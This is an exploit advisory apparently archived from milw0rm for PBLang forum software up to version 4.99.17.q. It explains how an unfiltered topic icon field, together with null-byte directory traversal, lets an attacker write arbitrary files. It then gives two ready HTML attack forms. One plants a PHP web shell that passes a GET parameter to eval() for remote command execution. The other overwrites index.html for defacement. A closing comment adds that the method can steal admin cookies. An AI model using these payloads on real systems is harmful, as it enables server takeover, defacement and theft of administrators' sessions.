104 lines
No EOL
4.1 KiB
Text
104 lines
No EOL
4.1 KiB
Text
---------------------------------------------------------------
|
|
____ __________ __ ____ __
|
|
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
|
|
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
|
|
| | | \ | |/ \ \___| | /_____/ | || |
|
|
|___|___| /\__| /______ /\___ >__| |___||__|
|
|
\/\______| \/ \/
|
|
---------------------------------------------------------------
|
|
|
|
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
|
|
|
|
---------------------------------------------------------------
|
|
|
|
PBLang <= 4.99.17.q Remote File Rewriting / Remote Command Execution
|
|
|
|
---------------------------------------------------------------
|
|
|
|
#By KiNgOfThEwOrLd
|
|
|
|
---------------------------------------------------------------
|
|
PoC:
|
|
|
|
PBLang is a flat forum, it doesn't need any database. When we write a new
|
|
topic, all the topics informations will be saved in a file located in
|
|
"\db\posts" (a not readeable directory). It looks like a php file, in fact the
|
|
informations will be saved in this way:
|
|
|
|
<?php
|
|
|
|
$psubject="[subject]";
|
|
$pcontent="[contenet]";
|
|
$pauthor="[author]";
|
|
$pdate="[date]";
|
|
$plastdate="";
|
|
$pimage="[icon]";
|
|
$plastreply="0";
|
|
$plastauthor="";
|
|
$preplies="0";
|
|
$pviews="0";
|
|
$pnotify="";
|
|
$plock="";
|
|
$pip="";
|
|
$pvisitors="";
|
|
$psticky="";
|
|
$plockview="";
|
|
|
|
?>
|
|
|
|
The "subject" and the "contenent" values is "htmlentitiesed", so we can't type
|
|
a malicious code there...but the "image" value is not filtred, so we can
|
|
execute a malicious code!
|
|
Don't worry if the directory is not readable, using the directory traversl
|
|
variable we can make a file where we want, and so we can read that! The file
|
|
name will be the "fid" value that we send via POST, and the file wont have any
|
|
estension, it will be like: fid_1 (or something like that). Then, editing the
|
|
cid value like: "evilfile.php\0", we can make a malicious file.
|
|
|
|
Ps. u gotta use nullbyte not encoded, like: \0
|
|
if u try to use %00 it will be not considered like nullbyte ;)
|
|
|
|
---------------------------------------------------------------
|
|
Remote Command Execution Exploit (Works only whit Magic Quotes OFF):
|
|
|
|
<!-- This code will make "31337.php" in http://[target]/[pblang_path], u can
|
|
execute a malicious code via GET as 31337.php?php=[YOUR_CODE] -->
|
|
<form action='[target]/ntopic.php?idnum=[idtopic]' name='postmodify'
|
|
enctype='multipart/form-data' method='POST' onSubmit='submitonce
|
|
(this);'target='_self'>
|
|
<input type='text' name='subject' value='Owned by KiNgOfThEwOrLd's Exploit'>
|
|
<input type='hidden' name='fid' value='../../../../31337.php\0'>
|
|
<input type='hidden' name='cat' value='2' size=40>
|
|
<input type='radio' name='topicicon' value='"; <?php eval(stripslashes($_GET
|
|
[php])); ?>' CHECKED>
|
|
<textarea name='message' rows='12' cols='60' onselect='storeCaret(this)'
|
|
onclick='storeCaret(this)' onkeyup='storeCaret(this)'>VISIT Http://www.inj3ct-
|
|
it.org</textarea>
|
|
<input type='hidden' name='gueststatus' value=''>
|
|
<input type='checkbox' name='EMNotify'>
|
|
<input type='submit' name='Submit' value='Own!'>
|
|
</form>
|
|
---------------------------------------------------------------
|
|
Index Rewriting Exploit
|
|
|
|
<!-- This code will rewrite or make "index.html" in http://[target]/
|
|
[pblang_path] -->
|
|
<form action='[target]/ntopic.php?idnum=[idtopic]' name='postmodify'
|
|
enctype='multipart/form-data' method='POST' onSubmit='submitonce
|
|
(this);'target='_self'>
|
|
<input type='text' name='subject' value='Owned by KiNgOfThEwOrLd's Exploit'>
|
|
<input type='hidden' name='fid' value='../../../../index.html\0'>
|
|
<input type='hidden' name='cat' value='2' size=40>
|
|
<input type='radio' name='topicicon' value='"; [YOUR HTML CODE]' CHECKED>
|
|
<textarea name='message' rows='12' cols='60' onselect='storeCaret(this)'
|
|
onclick='storeCaret(this)' onkeyup='storeCaret(this)'>VISIT Http://www.inj3ct-
|
|
it.org</textarea>
|
|
<input type='hidden' name='gueststatus' value=''>
|
|
<input type='checkbox' name='EMNotify'>
|
|
<input type='submit' name='Submit' value='Own!'>
|
|
</form>
|
|
<!-- You can also use this one to steal the admin's cookies, or execute some
|
|
arbitrary operations ;) -->
|
|
---------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-11-24] |